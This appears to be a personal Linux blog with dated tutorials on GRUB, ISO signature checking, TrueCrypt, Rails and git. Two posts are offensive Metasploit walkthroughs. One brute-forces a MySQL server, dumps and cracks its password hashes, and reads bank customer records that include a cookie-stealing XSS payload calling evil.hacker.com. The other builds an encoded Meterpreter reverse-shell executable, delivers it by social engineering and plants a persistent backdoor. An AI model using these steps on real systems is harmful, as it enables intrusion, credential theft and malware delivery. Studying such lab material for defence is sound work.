Linux & Hacking Guide

Thursday 19 January 2017

Add entry for Windows 7 in Grub2 in CentOS7

1) Create the following file.
[root@block1 ~]# vi /etc/grub.d/40_custom

menuentry "Microsoft Windows 7"{
set root='(hd0,msdos1)'
chainloader +1
}

2) Run the following command.
[root@block1 ~]# cd /boot/grub2
[root@block1 grub2]# grub2-mkconfig -o grub.cfg

3) Reboot the machine. You will now see entry for Windows 7 in grub menu.

Install grub 2 bootloader using CentOS7 Installation DVD

1) Boot the machine using CentOS installation DVD

2) On the first screen, Select the option Troubleshooting.

3) On the next screen, select the option Rescue a CentOS system.

4) On the next screen, The rescue environment will now attempt to find your linux installation and mount it under the dir /mnt/sysimage. Select the option Continue.

5) You will now get a shell prompt.

6) Type the following commands

chroot /mnt/sysimage

grub2-install /dev/sda

exit

exit

7) Remove the dvd and boot from the harddisk.

Friday 22 April 2016

Verify the integrity of downloaded ISO files

You should always verify any downloaded ISO file. The reason is that the file may have been maliciously modified by a hacker and can install malware like backdoors, keyloggers etc into your computers.

The ISO file is signed using the private key to create a digital signature. The public key is used to verify the signature. The digital signature file is used to verify the ISO file.

This verifies that the file has been created by the owner himself, since nobody else has his private key. Also, it verifies that the file has not been modified or tampered in any way.

1) Download the ISO file.

[shabbir@block1 Downloads]$ wget https://github.com/Security-Onion-Solutions/security-onion/releases/download/v14.04.4.1/securityonion-14.04.4.1.iso

2) Download the digital signature for the above downloaded ISO file.

[shabbir@block1 Downloads]$ wget https://github.com/Security-Onion-Solutions/security-onion/raw/master/securityonion-14.04.4.1.iso.sig

3) Download the public key.

[shabbir@block1 Downloads]$ wget https://raw.githubusercontent.com/Security-Onion-Solutions/security-onion/master/KEYS

4) Import the public key in your public keyring.
[shabbir@block1 Downloads]$ gpg --import KEYS

5) View your public keyring
[shabbir@block1 Downloads]$ gpg2 --list-keys
/home/shabbir/.gnupg/pubring.gpg
--------------------------------
pub   4096R/ED6CF680 2012-06-29
uid                  Doug Burks <doug.burks@gmail.com>
sub   4096R/C5D9F4EB 2012-06-29

6) Verify the ISO file using the signature file.
[shabbir@block1 Downloads]$ gpg --verify securityonion-14.04.4.1.iso.sig securityonion-14.04.4.1.iso
gpg: Signature made Sat 19 Mar 2016 05:32:50 PM IST using RSA key ID ED6CF680
gpg: Good signature from "Doug Burks <doug.burks@gmail.com>"
gpg: WARNING: This key is not certified with a trusted signature!
gpg:          There is no indication that the signature belongs to the owner.
Primary key fingerprint: BD56 2813 E345 A068 5FBB 91D3 788F 62F8 ED6C F680

Wednesday 20 April 2016

Creating Encrypted volumes using Truecrypt in Kali Linux

TrueCrypt is a software for establishing and maintaining on the fly encrypted volumes. On the fly encryption means the data is automatically encrypted before it is saved and decrypted before it is loaded without user intervention.

1) Open TrueCrypt
root@kali:~# truecrypt

A Gui window will open

2)Click on Create Volume.

3)Select option Create an encrypted file container as shown below.

This option creates a container containing encrypted files. This files can be of any type as long as they are in conatiner they are encrypted

4)Select the option Standard TrueCrypt volume.

5)Specify the location for the container
/root/Desktop/try

6)Specify the encryption standard.

7)Select the size of volume you want.
It displays free space below the box used to specify size

8) Set password for encryption.

9) Select Filesystem you want on that volume

10) Select I will mount th evolume only on linux

11) Click on format

//Mount Volume to use it to create files and directories
1)Select one of the slot in the list and select file volume file

2) Click on Mount to mount this volume

3)now from terminal acess this volumeor u can use GUI
root@kali:~# df
Filesystem             1K-blocks    Used Available Use% Mounted on
rootfs                  11459808 9637072   1217552 89% /
udev                       10240       0     10240   0% /dev
tmpfs                     102488     508    101980   1% /run
/dev/mapper/kali-root   11459808 9637072   1217552 89% /
tmpfs                       5120       0      5120   0% /run/lock
tmpfs                     204960      84    204876   1% /run/shm
/dev/sda1                 233191   26050    194700 12% /boot
/dev/mapper/truecrypt1     30356     430     27436   2% /media/truecrypt1

4) Change directory to /media/truecrypt1 and create files and directories
                root@kali:~# cd /media/truecrypt1/
                   root@kali:/media/truecrypt1# mkdir first
                   root@kali:/media/truecrypt1/first# touch foo1

5) unmount volumes using terminal or Gui
          1) For Gui Click on Dismount in Truecrypt
2) For Terminal goto root directory and unmount truecrypt1
root@kali:/# umount /media/truecrypt1

AJAX in Ruby On Rails: Sample Application

1) Create a new project. Generate Model and Controller

[shabbir@neutron Aptana Studio 3 Workspace]$ rails new ajax1

[shabbir@neutron Aptana Studio 3 Workspace]$ cd ajax1/

[shabbir@neutron ajax1]$ rails generate model Task name:string

[shabbir@neutron ajax1]$ rake db:migrate

[shabbir@neutron ajax1]$ rails generate controller tasks index

2) routes.rb

resources :tasks

root 'tasks#index'

3) task_controller.rb

class TasksController < ApplicationController
def index
    @tasks = Task.all
end

def new
    @task = Task.new
end

def create
    @task= Task.new(task_params)
    @task.save

    @tasks = Task.all
end

def edit
    @task = Task.find(params[:id])
end

def update
    @task = Task.find(params[:id])
    @task.update(task_params)

    @tasks = Task.all
end

def destroy
    @task = Task.find(params[:id])
    @task.destroy

    @tasks = Task.all
end

private
def task_params
    params.require(:task).permit(:name)
end
end

4) Views

When the user clicks on the "New Task" link, an AJAX request is sent to the server since "remote: true' is set.
index.html.erb

<div>
    <%= link_to "New Task" , new_task_path, id: "new_link", remote: true %>
</div>

<div id="task_form" style="display:none">
</div>

<h2> List All Tasks </h2>

<div id="tasks">
<%= render 'list' %>
</div>

When the user clicks on the "Edit" or "Delete" links, an AJAX request is sent to the server since "remote: true' is set.
_list.html.erb

<table>
<tr>
    <th>Name</th><th colspan="3"></th>
</tr>
<% @tasks.each do |task| %>
    <tr>
        <td><%= task.name %> </td>
        <td><%= link_to 'Edit', edit_task_path(task), remote: true %></td>
        <td><%= link_to 'Delete', task, method: :delete, data: {confirm: 'Are you sure ?'}, remote: true %></td>

    </tr>
<% end %>
</table>

When the user submits the form, an AJAX request is sent to the server since "remote: true' is set.
_form.html.erb

<%= form_for @task, remote: true do |f| %>

<%= f.label :name %>
<%= f.text_field :name %>

<%= f.submit "Save" %>
<% end %>

5) Javascript

When the user clicks on the "New Task" link, the form is displayed and the "New Task" link is hidden.
new.js.erb

$("#new_link").hide();

$("#task_form").html("<%= j (render 'form') %>");

$("#task_form").slideDown();

After the Task is created, the "New Task" link is displayed ,the form is hidden and the list of tasks is updated.

create.js.erb

$("#new_link").show();

$("#task_form").slideUp();

$("#tasks").html("<%= j (render('list')) %>" );

When the user clicks on the "Edit" link, the form is displayed and the "New Task" link is hidden.

edit.js.erb

$("#new_link").hide();

$("#task_form").html("<%= j (render 'form') %>");

$("#task_form").slideDown();

After the Task is updated, the "New Task" link is displayed ,the form is hidden and the list of tasks is updated.

update.js.erb
$("#new_link").show();

$("#task_form").slideUp();

$("#tasks").html("<%= j (render('list')) %>" );

When the user clicks on the "Delete" link, the task is destroyed and the list of tasks is updated.

destroy.js.erb
$("#tasks").html("<%= j (render('list')) %>" );

Tuesday 3 November 2015

Version Control using git in CentOS7

Version control systems allow you to keep track of your software at the source level. You can track changes, revert to previous stages, and branch off from the base code to create alternative versions of files and directories.
One of the most popular version control systems is git. Many projects maintain their files in a Git repository, and sites like GitHub and Bitbucket have made sharing and contributing to code with Git easier than ever.
In this guide, we will demonstrate how to install Git on a CentOS 7 server.

1) Install git.

[shabbir@compute1 ~]$ sudo yum install git

2) Configure your name and email.

[shabbir@compute1 ~]$ git config --global user.name "shabbir rangwala"
[shabbir@compute1 ~]$ git config --global user.email "shabbir.ahr@gmail.com"

[shabbir@compute1 ~]$ git config --list
user.name=shabbir rangwala
user.email=shabbir.ahr@gmail.com

3) Create your workspace. Create a dir. 'git' in the home directory and subfolders for each of our individual projects.

[shabbir@compute1 ~]$ mkdir -p ~/git/perl
[shabbir@compute1 ~]$ cd ~/git/perl

4) Copy all project files to the dir. Here we create a test file to use in our repository.

[shabbir@compute1 perl]$ touch test_file.pl

5) Tell git that you want to use your current directory as a git environment.

[shabbir@compute1 perl]$ git init
Initialized empty Git repository in /home/shabbir/git/perl/.git/

6) Add all files and directories to your newly created repository.

[shabbir@compute1 perl]$ git add .

7) Every time you add or make changes to files, you need to write a commit message. Commit messages explain what your change did.

[shabbir@compute1 perl]$ git commit -m "Initial Commit" -a

the -a signifies that we want our commit message to be applied to all added or modified files. This is okay for the first commit, but generally you should specify the individual files or directories that we want to commit.

To commit an individual file.
[shabbir@compute1 perl]$ git commit -m "Initial Commit" test_file.pl

To add additional files or directories, you just add a space separated list to the end of that command.

8) Create an account on github.com and create a repository 'perl'

9) Configure the remote repository. The name is 'origin' and the URL is 'https://github.com/RShabbir53/perl.git'.

[shabbir@compute1 perl]$ git remote add origin https://github.com/RShabbir53/perl.git

[shabbir@compute1 perl]$ git remote -v
origin https://github.com/RShabbir53/perl.git (fetch)
origin https://github.com/RShabbir53/perl.git (push)

10) Push code to the remote server. "git push" tells git that we want to push our changes, "origin" is the name of our newly-configured remote server and "master" is the name of the first branch.
In the future, when you have commits that you want to push to the server, you can simply type "git push".

[shabbir@compute1 perl]$ git push -u origin master

11) In the future, when you have commits that you want to push to the server, you can simply type "git push".

Sunday 1 November 2015

Install Ruby on Rails in CentOS7

1) Install prerequisites.

[shabbir@compute1~]$ sudo yum install -y git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel

2) Install rbenv

[shabbir@compute1~]$ git clone git://github.com/sstephenson/rbenv.git .rbenv

[shabbir@compute1~]$ echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bash_profile

[shabbir@compute1~]$ echo 'eval "$(rbenv init -)"' >> ~/.bash_profile

[shabbir@compute1~]$ exec $SHELL

[shabbir@compute1~]$ git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build

[shabbir@compute1~]$ echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bash_profile

[shabbir@compute1~]$ exec $SHELL

Reboot the machine.

[shabbir@compute1~]$ systemctl reboot

3) Install Ruby

[shabbir@compute1 ~]$ rbenv install -v 2.2.3

[shabbir@compute1 ~]$ rbenv global 2.2.3

Verify that Ruby was installed properly.
[shabbir@compute1 ~]$ ruby -v
ruby 2.2.3p173 (2015-08-18 revision 51636) [x86_64-linux]

[shabbir@compute1 ~]$ echo "gem: --no-document" > ~/.gemrc

[shabbir@compute1 ~]$ gem install bundler

4) Install Rails

[shabbir@compute1 ~]$ gem install rails -v 4.2.4

[shabbir@compute1 ~]$ rbenv rehash

Verify that Rails was installed properly.
[shabbir@compute1 ~]$ rails -v

Rails 4.2.4

5) Install JavaScript Runtime

Install EPEL Repository.
[shabbir@compute1 ~]$ sudo yum -y install epel-release

[shabbir@compute1 ~]$ sudo yum install nodejs

6) Install Database

[shabbir@compute1 ~]$ sudo yum groupinstall mariadb

[shabbir@compute1 ~]$ sudo yum install mariadb-devel

[shabbir@compute1 ~]$ sudo systemctl enable mariadb

[shabbir@compute1 ~]$ sudo systemctl start mariadb

[shabbir@compute1 ~]$ gem install mysql

[shabbir@compute1 ~]$ rbenv rehash

7) Create 'Hello World' Application

7.1) Create Demo Project

[shabbir@compute1 ~]$ rails new demo

7.2) Start the Web Server.

[shabbir@compute1 ~]$ cd demo

[shabbir@compute1 demo]$ rails server

7.3) Open a browser and type the following URL. http://localhost:3000

NOTE: To stop the web server, hit Ctrl+C in the terminal window where it's running.

7.4) Create a new controller called "welcome" with an action called "index".

[shabbir@compute1 demo]$ generate controller welcome index
      create app/controllers/welcome_controller.rb
       route get 'welcome/index'
      invoke erb
      create    app/views/welcome
      create    app/views/welcome/index.html.erb
      invoke test_unit
      create    test/controllers/welcome_controller_test.rb
      invoke helper
      create    app/helpers/welcome_helper.rb
      invoke    test_unit
      invoke assets
      invoke    coffee
      create      app/assets/javascripts/welcome.coffee
      invoke    scss
      create      app/assets/stylesheets/welcome.scss

The controller, is located at app/controllers/welcome_controller.rb and the view, located at app/views/welcome/index.html.erb.

7.5) Edit the View.

[shabbir@compute1 demo]$ vi app/views/welcome/index.html.erb

<h1>Hello, World!</h1>

7.6) Now that we have made the controller and view, we need to tell Rails when we want "Hello, World!" to show up. In our case, we want it to show up when we navigate to the root URL of our site, http://localhost:3000. At the moment, "Welcome aboard" is occupying that spot.

Edit the application's routing file.
[shabbir@compute1 demo]$ vi config/routes.rb

Uncomment the following line
root 'welcome#index'

7.7) Ensure that the Web server is running. Open a browser and type the following URL. http://localhost:3000

Saturday 27 June 2015

Hack MySQL Server in RHEL7 using Metasploit in Kali Linux

In this tutorial, we will hack MySQL Server running in RHEL 7 using Metasploit running in Kali Linux.

MySQL Server Name: meru.mycompany.com
MySQL Server IP Address: 192.168.122.1

Perform the following steps on the Kali Linux Machine

1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.

root@kali:~# msfconsole
msf >

2) Perform nmap scan on MySQL Server.
msf > db_nmap -sV 192.168.122.1 -p 3306
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-27 10:03 IST
[*] Nmap: Nmap scan report for meru.mycompany.com (192.168.122.1)
[*] Nmap: Host is up (0.00034s latency).
[*] Nmap: PORT     STATE SERVICE VERSION
[*] Nmap: 3306/tcp open mysql   MySQL 5.5.35-MariaDB
[*] Nmap: MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds

3) Perform brute force password attack.
msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting Required Description
   ----              --------------- -------- -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED 5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mysql_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/unix_users.txt

msf auxiliary(mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

msf auxiliary(mysql_login) > set RHOSTS 192.168.122.1
RHOSTS => 192.168.122.1

msf auxiliary(mysql_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true

msf auxiliary(mysql_login) > run

[*] 192.168.122.1:3306 MYSQL - Found remote MySQL version 5.5.35
Access denied for user 'anon'@'192.168.122.115' (using password: YES))[-] 192.168.122.1:3306 MYSQL - LOGIN FAILED: anon:iloveyou (Incorrect: Access denied for user 'anon'@'192.168.122.115' (using password: YES))
[-] 192.168.122.1:3306 MYSQL - LOGIN FAILED: anon:admin (Incorrect: Access denied for user 'anon'@'192.168.122.115' (using password: YES))
[+] 192.168.122.1:3306 MYSQL - Success: 'root:root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As seen above, we have cracked login credentials for User 'root' with password 'root'

4) Capture other user credentials. We will capture the password hashes and then crack it using John the Ripper.

msf > use auxiliary/scanner/mysql/mysql_hashdump
msf auxiliary(mysql_hashdump) > show options

Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Name      Current Setting Required Description
   ----      --------------- -------- -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     3306             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME                   no        The username to authenticate as

msf auxiliary(mysql_hashdump) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_hashdump) > set PASSWORD root
PASSWORD => root
msf auxiliary(mysql_hashdump) > run

[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] Saving HashString as Loot: shabbir:*8A5EC1AC3F305AF2D49B4AC632B4829A9440E667
[+] Saving HashString as Loot: user:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] Saving HashString as Loot: anon@localhost:*2CE4701D02A76C12CD513109CA16967A68B4C23A
[+] Saving HashString as Loot: anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
[+] Saving HashString as Loot: anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
[+] Saving HashString as Loot: root:*01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Open another terminal window and copy the password hashes to a file 'temp' as shown below.
root@kali:~# vi temp

root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
shabbir:*8A5EC1AC3F305AF2D49B4AC632B4829A9440E667
user:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
anon@localhost:*2CE4701D02A76C12CD513109CA16967A68B4C23A
anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
root:*01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C

Run John the Ripper to crack the hashes.

root@kali:~# john temp
Created directory: /root/.john
Loaded 9 password hashes with no different salts (MySQL 4.1 double-SHA-1 [128/128 SSE2 intrinsics 4x])
root             (root)
root             (root)
root             (root)
shabbir          (shabbir)
password         (user)
princess         (anon@localhost)
princess         (anon)
princess         (anon)

root@kali:~# john temp --show
root:root
root:root
root:root
shabbir:shabbir
user:password
anon@localhost:princess
anon:princess
anon:princess

5) Browse MySQL Server.

msf > use auxiliary/admin/mysql/mysql_enum

msf auxiliary(mysql_enum) > show options

Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting Required Description
   ----      --------------- -------- -----------
   PASSWORD                   no        The password for the specified username
   RHOST                      yes       The target address
   RPORT     3306             yes       The target port
   USERNAME                   no        The username to authenticate as

msf auxiliary(mysql_enum) > set RHOST 192.168.122.1
RHOST => 192.168.122.1

msf auxiliary(mysql_enum) > set USERNAME root
USERNAME => root

msf auxiliary(mysql_enum) > set PASSWORD root
PASSWORD => root

msf auxiliary(mysql_enum) > run

[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*]     MySQL Version: 5.5.35-MariaDB
[*]     Compiled for the following OS: Linux
[*]     Architecture: x86_64
[*]     Server Hostname: meru.mycompany.com
[*]     Data Directory: /var/lib/mysql/
[*]     Logging of queries and logins: OFF
[*]     Old Password Hashing Algorithm OFF
[*]     Loading of local files: ON
[*]     Logins with old Pre-4.1 Passwords: OFF
[*]     Allow Use of symlinks for Database Files: DISABLED
[*]     Allow Table Merge:
[*]     SSL Connection: DISABLED
[*] Enumerating Accounts:
[*]     List of Accounts with Password Hashes:
[*]         User: root Host: localhost Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: root Host: 127.0.0.1 Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: root Host: ::1 Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: shabbir Host: % Password Hash: *8A5EC1AC3F305AF2D49B4AC632B4829A9440E667
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: user Host: localhost Password Hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: anon@localhost Host: % Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: anon Host: localhost Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: anon Host: 192.168.122.% Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: root Host: % Password Hash: *01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]     The following users have GRANT Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]     The following users have CREATE USER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have RELOAD Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have SHUTDOWN Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have SUPER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have FILE Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have PROCESS Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following accounts have privileges to the mysql database:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following accounts are not restricted by source:
[*]         User: anon@localhost Host: %
[*]         User: root Host: %
[*]         User: shabbir Host: %
[*] Auxiliary module execution completed

6) View MySQL Server Database Schema.

msf > info auxiliary/scanner/mysql/mysql_schemadump

       Name: MYSQL Schema Dump
     Module: auxiliary/scanner/mysql/mysql_schemadump
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
theLightCosine <theLightCosine@metasploit.com>

Basic options:
Name             Current Setting Required Description
----             --------------- -------- -----------
DISPLAY_RESULTS true             yes       Display the Results to the Screen
PASSWORD                          no        The password for the specified username
RHOSTS                            yes       The target address range or CIDR identifier
RPORT            3306             yes       The target port
THREADS          1                yes       The number of concurrent threads
USERNAME                          no        The username to authenticate as

Description:
This module extracts the schema information from a MySQL DB server.

msf > use auxiliary/scanner/mysql/mysql_schemadump

msf auxiliary(mysql_schemadump) > set USERNAME shabbir
USERNAME => shabbir
msf auxiliary(mysql_schemadump) > set PASSWORD shabbir
PASSWORD => shabbir

msf auxiliary(mysql_schemadump) > set RHOSTS 192.168.122.1
RHOSTS => 192.168.122.1

msf auxiliary(mysql_schemadump) > run

[*] Schema stored in: /root/.msf4/loot/20150627113706_default_192.168.122.1_mysql_schema_138881.txt
[+] MySQL Server Schema
Host: 192.168.122.1
Port: 3306
====================

---
- DBName: mybank
Tables:
- TableName: customer
    Columns:
    - ColumnName: loginid
      ColumnType: varchar(50)
    - ColumnName: passwd
      ColumnType: varchar(50)
    - ColumnName: custname
      ColumnType: varchar(100)
    - ColumnName: accountno
      ColumnType: int(11)
    - ColumnName: balance
      ColumnType: decimal(10,2)
    - ColumnName: address
      ColumnType: varchar(500)
    - ColumnName: mobile
      ColumnType: varchar(50)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

7) Run SQL Query

msf auxiliary(mysql_enum) > use auxiliary/admin/mysql/mysql_sql

msf auxiliary(mysql_sql) > show options

Module options (auxiliary/admin/mysql/mysql_sql):

   Name      Current Setting   Required Description
   ----      ---------------   -------- -----------
   PASSWORD                    no        The password for the specified username
   RHOST                       yes       The target address
   RPORT     3306              yes       The target port
   SQL       select version() yes       The SQL to execute.
   USERNAME                    no        The username to authenticate as

msf auxiliary(mysql_sql) > set RHOST 192.168.122.1
RHOST => 192.168.122.1

msf auxiliary(mysql_sql) > set username shabbir
username => shabbir

msf auxiliary(mysql_sql) > set password shabbir
password => shabbir

msf auxiliary(mysql_sql) > set sql select * from mybank.customer
sql => select * from mybank.customer

msf auxiliary(mysql_sql) > run

[*] Sending statement: 'select * from mybank.customer'...
[*] | batul | dahod | batul ben dahod | 1234 | 25000.00 | fdfdfdfdfd | 5454545454 |
[*] | shabbir | shabbir | shabbir rangwala | 1000 | 49000.00 | dkdkdkdkd dkdkdkdkd | 193933030 |
[*] | taher | taher | taher saifee | 2000 | 8000.00 | dddl fkfkfl flflflfll | 122222233 |
[*] | trudy | trudy | trudy chennai | 1050 | 20000.00 | <a href=# onclick="document.location='http://evil.hacker.com/xss.php?c='+escape(document.cookie);"My Address</a> | 2345678531 |
[*] Auxiliary module execution completed

Thursday 25 June 2015

Install Backdoor in Windows XP using Metasploit in Kali Linux

We have the following scenario:

Victim (Windows XP Machine) IP Address: 192.168.1.2

Attacker (Kali Linux Machine) IP Address: 192.168.1.3

We will use Social Engineering Toolkit in Kali Linux to generate a malicious executable payload that, when made to run at the Windows XP machine,will get the attacker complete access of the victim's machine. Then the attacker will use Metasploit to install a permanent backdoor on the victim machine.

We will perform the following steps:
1) Create malicious payload
2) Give the payload to the Victim.
3) Create listener (for the payload) on the Attacker on port 443.
4) When the user executes the payload, the Victim connects to the Attacker on port 443.
5) Escalate privilege to Windows user SYSTEM.
6) Install backdoor on the Victim.
7) Create listener (for the backdoor) on the Attacker on port 80.
8) Whenever the Victim boots, it automatically connects to the Attacker.

Perform the following steps on the Attacker (Kali Linux) Machine:

1) Create malicious executable payload.
1.1) Start Social Engineering Toolkit.
root@kali:~# setoolkit

1.2) Select option 1) Social Engineering Attacks
set> 1

1.3) Select option   4) Create a Payload and Listener
set> 4
set:payloads> Enter the IP address for the payload (reverse):192.168.1.3

What payload do you want to generate:

Name:                                       Description:

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system

set:payloads>2

Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
in order to get around basic AV detection.

   1) shikata_ga_nai
   2) No Encoding
   3) Multi-Encoder
   4) Backdoored Executable

set:encoding>1
set:payloads> PORT of the listener [443]:
[-] Encoding the payload 4 times. [-]

[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 341 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=4)

[*] Your payload is now in the root directory of SET as payload.exe
[-] The payload can be found in the SET home directory.
set> Start the listener now? [yes|no]: no

2) We need to send this payload file /usr/share/set/payload.exe to the Victim using social media, e-mail, uploading at a server, or any other type of choice.

3) Set up a handler on the Attacker machine using Metasploit.
3.1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.

3.2) Start metasploit console.
root@kali:~# msfconsole
msf >

3.3) Select exploit.
msf > use exploit/multi/handler

3.4) Select payload.
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

3.5) View options
msf exploit(handler) > show options
Module options (exploit/multi/handler):

   Name Current Setting Required Description
   ---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting Required Description
   ----      --------------- -------- -----------
   EXITFUNC process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id Name
   -- ----
   0   Wildcard Target

3.6) Set options
msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(handler) > set LPORT 443
LPORT => 443

3.7) Execute exploit
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.3:443
[*] Starting the payload handler...

4) As soon as the victim runs the executable file, the payload will make a connection to the attacker system, giving the attacker complete control of the victim machine.

[*] Sending stage (769536 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.3:443 -> 192.168.1.2:1038) at 2015-06-25 06:52:57 +0530

meterpreter > sysinfo
Computer        : WINSETU
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
